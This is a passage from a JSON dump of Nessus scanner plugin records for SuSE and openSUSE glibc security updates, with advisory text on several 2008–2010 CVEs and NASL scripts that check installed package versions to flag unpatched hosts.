with the rest of\n passwd columns instead of keeping it in the shadow\n table. Normally, Solaris will disclose this information\n only to clients bound to a priviledged port, but when\n nscd is deployed on the client, getpwnam() would\n disclose the password hashes to all users. New mode\n 'adjunct as shadow' can now be enabled in\n /etc/default/nss that will move the password hashes from\n the world-readable passwd table to emulated shadow table\n (that is not cached by nscd). (CVE-2010-0015)\n\nSome invalid behaviour, crashes and memory leaks were fixed :\n\n - statfs64() would not function properly on IA64 in ia32el\n emulation mode.\n\n - memcpy() and memset() on power6 would erroneously use a\n 64-bit instruction within 32-bit code in certain corner\n cases.\n\n - nscd would not load /etc/host.conf properly before\n performing host resolution - most importantly, multi on\n in /etc/host.conf would be ignored when nscd was used,\n breaking e.g. resolving records in /etc/hosts where\n single name would point at multiple addresses\n\n - Removed mapping from lowercase sharp s to uppercase\n sharp S; uppercase S is not a standardly used letter and\n causes problems for ISO encodings.\n\nSome other minor issues were fixed :\n\n - glibc-locale now better coexists with sap-locale on\n upgrades by regenerating the locale/gconv indexes\n properly.\n\n - Ports 623 and 664 may not be allocated by RPC code\n automatically anymore since that may clash with ports\n used on some IPMI network cards.\n\n - On x86_64, backtrace of a static destructor would stop\n in the _fini() glibc pseudo-routine, making it difficult\n to find out what originally triggered the program\n termination. The routine now has unwind information\n attached.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=375315\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=445636\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=513961\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=534828\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=541773\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=569091\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=572188\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=585879\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=592941\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=594263\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=615556\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=646960\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-1391.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-0015.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-0296.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-0830.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3847.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3856.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Apply SAT patch number 3392 / 3393 as appropriate.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'glibc LD_AUDIT Arbitrary DSO Load Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(189, 255);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:glibc-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:glibc-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:glibc-html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:glibc-i18ndata\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:glibc-info\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:glibc-locale\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:glibc-locale-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:glibc-profile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:glibc-profile-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/10/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/12/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"glibc-2.9-13.11.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"glibc-devel-2.9-13.11.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"glibc-i18ndata-2.9-13.11.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"glibc-locale-2.9-13.11.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"nscd-2.9-13.11.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i686\", reference:\"glibc-2.9-13.11.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i686\", reference:\"glibc-devel-2.9-13.11.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"glibc-2.9-13.11.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"glibc-32bit-2.9-13.11.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"glibc-devel-2.9-13.11.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"glibc-devel-32bit-2.9-13.11.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"glibc-i18ndata-2.9-13.11.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"glibc-locale-2.9-13.11.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"glibc-locale-32bit-2.9-13.11.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"nscd-2.9-13.11.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"glibc-2.11.1-0.20.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"glibc-devel-2.11.1-0.20.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"glibc-i18ndata-2.11.1-0.20.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"glibc-locale-2.11.1-0.20.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"nscd-2.11.1-0.20.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i686\", reference:\"glibc-2.11.1-0.20.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i686\", reference:\"glibc-devel-2.11.1-0.20.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"glibc-2.11.1-0.20.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"glibc-32bit-2.11.1-0.20.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"glibc-devel-2.11.1-0.20.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"glibc-devel-32bit-2.11.1-0.20.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"glibc-i18ndata-2.11.1-0.20.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"glibc-locale-2.11.1-0.20.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"glibc-locale-32bit-2.11.1-0.20.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"nscd-2.11.1-0.20.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"glibc-2.9-13.11.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"glibc-devel-2.9-13.11.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"glibc-html-2.9-13.11.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"glibc-i18ndata-2.9-13.11.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"glibc-info-2.9-13.11.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"glibc-locale-2.9-13.11.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"glibc-profile-2.9-13.11.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"nscd-2.9-13.11.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"s390x\", reference:\"glibc-32bit-2.9-13.11.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"s390x\", reference:\"glibc-devel-32bit-2.9-13.11.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"s390x\", reference:\"glibc-locale-32bit-2.9-13.11.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"s390x\", reference:\"glibc-profile-32bit-2.9-13.11.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"x86_64\", reference:\"glibc-32bit-2.9-13.11.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"x86_64\", reference:\"glibc-devel-32bit-2.9-13.11.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"x86_64\", reference:\"glibc-locale-32bit-2.9-13.11.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"x86_64\", reference:\"glibc-profile-32bit-2.9-13.11.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"glibc-2.11.1-0.20.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"glibc-devel-2.11.1-0.20.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"glibc-html-2.11.1-0.20.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"glibc-i18ndata-2.11.1-0.20.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"glibc-info-2.11.1-0.20.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"glibc-locale-2.11.1-0.20.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"glibc-profile-2.11.1-0.20.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"nscd-2.11.1-0.20.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"s390x\", reference:\"glibc-32bit-2.11.1-0.20.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"s390x\", reference:\"glibc-devel-32bit-2.11.1-0.20.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"s390x\", reference:\"glibc-locale-32bit-2.11.1-0.20.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"s390x\", reference:\"glibc-profile-32bit-2.11.1-0.20.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"glibc-32bit-2.11.1-0.20.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"glibc-devel-32bit-2.11.1-0.20.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"glibc-locale-32bit-2.11.1-0.20.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"glibc-profile-32bit-2.11.1-0.20.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-17T14:44:14", "description": "Several security issues were fixed :\n\n - Decoding of the $ORIGIN special value in various LD_\n environment variables allowed local attackers to execute\n code in context of e.g. setuid root programs, elevating\n privileges. This issue does not affect SUSE as an\n assertion triggers before the respective code is\n executed. The bug was fixed nevertheless.\n (CVE-2010-3847)\n\n - The LD_AUDIT environment was not pruned during setuid\n root execution and could load shared libraries from\n standard system library paths. This could be used by\n local attackers to inject code into setuid root programs\n and so elevated privileges. (CVE-2010-3856)\n\n - Integer overflow causing arbitrary code execution in\n ld.so --verify mode could be induced by a specially\n crafted binary. (CVE-2010-0830)\n\n - The addmntent() function would not escape the newline\n character properly, allowing the user to insert\n arbitrary newlines to the /etc/mtab; if the addmntent()\n is run by a setuid mount binary that does not do extra\n input checking, this would allow custom entries to be\n inserted in /etc/mtab. (CVE-2010-0296)\n\n - The strfmon() function contains an integer overflow\n vulnerability in width specifiers handling that could be\n triggered by an attacker that can control the format\n string passed to strfmon(). (CVE-2008-1391)\n\n - Some setups (mainly Solaris-based legacy setups) include\n shadow information (password hashes) as so-called\n 'adjunct passwd' table, mangling it with the rest of\n passwd columns instead of keeping it in the shadow\n table. Normally, Solaris will disclose this information\n only to clients bound to a priviledged port, but when\n nscd is deployed on the client, getpwnam() would\n disclose the password hashes to all users. New mode\n 'adjunct as shadow' can now be enabled in\n /etc/default/nss that will move the password hashes from\n the world-readable passwd table to emulated shadow table\n (that is not cached by nscd). (CVE-2010-0015)\n\nSome invalid behavior, crashes and memory leaks were fixed :\n\n - nscd in the paranoia mode would crash on the periodic\n restart in case one of the databases was disabled in the\n nscd configuration.\n\n - When closing a widechar stdio stream, memory would\n sometimes be leaked.\n\n - memcpy() on power6 would errorneously use a 64-bit\n instruction within 32-bit code in certain corner cases.\n\n - jrand48() returns numbers in the wrong range on 64-bit\n systems: Instead of [-231, +231), the value was always\n positive and sometimes higher than the supposed upper\n bound.\n\n - Roughly every 300 days of uptime, the times() function\n would report an error for 4096 seconds, a side-effect of\n how system calls are implemented on i386. glibc was\n changed to never report an error and crash an\n application that would trigger EFAULT by kernel (because\n of invalid pointer passed to the times() syscall)\n before.\n\n - getifaddrs() would report infiniband interfaces with\n corrupted ifa_name structure field.\n\n - getgroups(-1) normally handles the invalid array size\n gracefully by setting EINVAL. However, a crash would be\n triggered in case the code was compiled using\n '-DFORTIFYSOURCE=2 -O2'.\n\n - Pthread cleanup handlers would not always be invoked on\n thread cancellation (e.g. in RPC code, but also in other\n parts of glibc that may hang outside of a syscall) -\n glibc is now compiled with\n\n -fasynchronous-unwind-tables. Some other minor issues\n were fixed :\n\n - There was a problem with sprof<->dlopen() interaction\n due to a missing flag in the internal dlopen() wrapper.\n\n - On x86_64, backtrace of a static destructor would stop\n in the _fini() glibc pseudo-routine, making it difficult\n to find out what originally triggered the program\n termination. The routine now has unwind information\n attached.\n\n - glibc-locale now better coexists with sap-locale on\n upgrades by regenerating the locale/gconv indexes\n properly.", "edition": 26, "published": "2010-10-28T00:00:00", "title": "SuSE 10 Security Update : glibc (ZYPP Patch Number 7201)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0015", "CVE-2010-0296", "CVE-2010-0830", "CVE-2010-3856", "CVE-2010-3847", "CVE-2008-1391"], "modified": "2010-10-28T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_GLIBC-7201.NASL", "href": "https://www.tenable.com/plugins/nessus/50377", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(50377);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-1391\", \"CVE-2010-0015\", \"CVE-2010-0296\", \"CVE-2010-0830\", \"CVE-2010-3847\", \"CVE-2010-3856\");\n\n script_name(english:\"SuSE 10 Security Update : glibc (ZYPP Patch Number 7201)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several security issues were fixed :\n\n - Decoding of the $ORIGIN special value in various LD_\n environment variables allowed local attackers to execute\n code in context of e.g. setuid root programs, elevating\n privileges. This issue does not affect SUSE as an\n assertion triggers before the respective code is\n executed. The bug was fixed nevertheless.\n (CVE-2010-3847)\n\n - The LD_AUDIT environment was not pruned during setuid\n root execution and could load shared libraries from\n standard system library paths. This could be used by\n local attackers to inject code into setuid root programs\n and so elevated privileges. (CVE-2010-3856)\n\n - Integer overflow causing arbitrary code execution in\n ld.so --verify mode could be induced by a specially\n crafted binary. (CVE-2010-0830)\n\n - The addmntent() function would not escape the newline\n character properly, allowing the user to insert\n arbitrary newlines to the /etc/mtab; if the addmntent()\n is run by a setuid mount binary that does not do extra\n input checking, this would allow custom entries to be\n inserted in /etc/mtab. (CVE-2010-0296)\n\n - The strfmon() function contains an integer overflow\n vulnerability in width specifiers handling that could be\n triggered by an attacker that can control the format\n string passed to strfmon(). (CVE-2008-1391)\n\n - Some setups (mainly Solaris-based legacy setups) include\n shadow information (password hashes) as so-called\n 'adjunct passwd' table, mangling it with the rest of\n passwd columns instead of keeping it in the shadow\n table. Normally, Solaris will disclose this information\n only to clients bound to a priviledged port, but when\n nscd is deployed on the client, getpwnam() would\n disclose the password hashes to all users. New mode\n 'adjunct as shadow' can now be enabled in\n /etc/default/nss that will move the password hashes from\n the world-readable passwd table to emulated shadow table\n (that is not cached by nscd). (CVE-2010-0015)\n\nSome invalid behavior, crashes and memory leaks were fixed :\n\n - nscd in the paranoia mode would crash on the periodic\n restart in case one of the databases was disabled in the\n nscd configuration.\n\n - When closing a widechar stdio stream, memory would\n sometimes be leaked.\n\n - memcpy() on power6 would errorneously use a 64-bit\n instruction within 32-bit code in certain corner cases.\n\n - jrand48() returns numbers in the wrong range on 64-bit\n systems: Instead of [-231, +231), the value was always\n positive and sometimes higher than the supposed upper\n bound.\n\n - Roughly every 300 days of uptime, the times() function\n would report an error for 4096 seconds, a side-effect of\n how system calls are implemented on i386. glibc was\n changed to never report an error and crash an\n application that would trigger EFAULT by kernel (because\n of invalid pointer passed to the times() syscall)\n before.\n\n - getifaddrs() would report infiniband interfaces with\n corrupted ifa_name structure field.\n\n - getgroups(-1) normally handles the invalid array size\n gracefully by setting EINVAL. However, a crash would be\n triggered in case the code was compiled using\n '-DFORTIFYSOURCE=2 -O2'.\n\n - Pthread cleanup handlers would not always be invoked on\n thread cancellation (e.g. in RPC code, but also in other\n parts of glibc that may hang outside of a syscall) -\n glibc is now compiled with\n\n -fasynchronous-unwind-tables. Some other minor issues\n were fixed :\n\n - There was a problem with sprof<->dlopen() interaction\n due to a missing flag in the internal dlopen() wrapper.\n\n - On x86_64, backtrace of a static destructor would stop\n in the _fini() glibc pseudo-routine, making it difficult\n to find out what originally triggered the program\n termination. The routine now has unwind information\n attached.\n\n - glibc-locale now better coexists with sap-locale on\n upgrades by regenerating the locale/gconv indexes\n properly.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-1391.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-0015.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-0296.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-0830.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3847.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3856.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 7201.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'glibc LD_AUDIT Arbitrary DSO Load Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(189, 255);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/10/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/10/28\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"glibc-2.4-31.77.76.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"glibc-devel-2.4-31.77.76.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"glibc-html-2.4-31.77.76.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"glibc-i18ndata-2.4-31.77.76.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"glibc-info-2.4-31.77.76.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"glibc-locale-2.4-31.77.76.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"nscd-2.4-31.77.76.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, cpu:\"x86_64\", reference:\"glibc-32bit-2.4-31.77.76.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, cpu:\"x86_64\", reference:\"glibc-devel-32bit-2.4-31.77.76.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, cpu:\"x86_64\", reference:\"glibc-locale-32bit-2.4-31.77.76.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"glibc-2.4-31.77.76.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"glibc-devel-2.4-31.77.76.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"glibc-html-2.4-31.77.76.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"glibc-i18ndata-2.4-31.77.76.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"glibc-info-2.4-31.77.76.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"glibc-locale-2.4-31.77.76.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"glibc-profile-2.4-31.77.76.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"nscd-2.4-31.77.76.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, cpu:\"x86_64\", reference:\"glibc-32bit-2.4-31.77.76.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, cpu:\"x86_64\", reference:\"glibc-devel-32bit-2.4-31.77.76.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, cpu:\"x86_64\", reference:\"glibc-locale-32bit-2.4-31.77.76.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, cpu:\"x86_64\", reference:\"glibc-profile-32bit-2.4-31.77.76.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-17T14:05:44", "description": "This update of glibc fixes various bugs and security issues :\n\nCVE-2010-3847: Decoding of the $ORIGIN special value in various LD_\nenvironment variables allowed local attackers to execute code in\ncontext of e.g. setuid root programs, elevating privileges. This issue\ndoes not affect SUSE as an assertion triggers before the respective\ncode is executed. The bug was fixed nevertheless.\n\nCVE-2010-3856: The LD_AUDIT environment was not pruned during setuid\nroot execution and could load shared libraries from standard system\nlibrary paths. This could be used by local attackers to inject code\ninto setuid root programs and so elevated privileges.\n\nCVE-2010-0830: Integer overflow causing arbitrary code execution in\nld.so\n\n--verify mode could be induced by a specially crafted binary.\n\nCVE-2010-0296: The addmntent() function would not escape the newline\ncharacter properly, allowing the user to insert arbitrary newlines to\nthe /etc/mtab; if the addmntent() is run by a setuid mount binary that\ndoes not do extra input checking, this would allow custom entries to\nbe inserted in /etc/mtab.\n\nCVE-2008-1391: The strfmon() function contains an integer overflow\nvulnerability in width specifiers handling that could be triggered by\nan attacker that can control the format string passed to strfmon().", "edition": 25, "published": "2010-10-28T00:00:00", "title": "openSUSE Security Update : glibc (openSUSE-SU-2010:0913-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0296", "CVE-2010-0830", "CVE-2010-3856", "CVE-2010-3847", "CVE-2008-1391"], "modified": "2010-10-28T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:glibc-devel", "p-cpe:/a:novell:opensuse:glibc-profile-32bit", "p-cpe:/a:novell:opensuse:glibc-profile", "p-cpe:/a:novell:opensuse:glibc", "p-cpe:/a:novell:opensuse:glibc-obsolete", "p-cpe:/a:novell:opensuse:glibc-info", "p-cpe:/a:novell:opensuse:glibc-32bit", 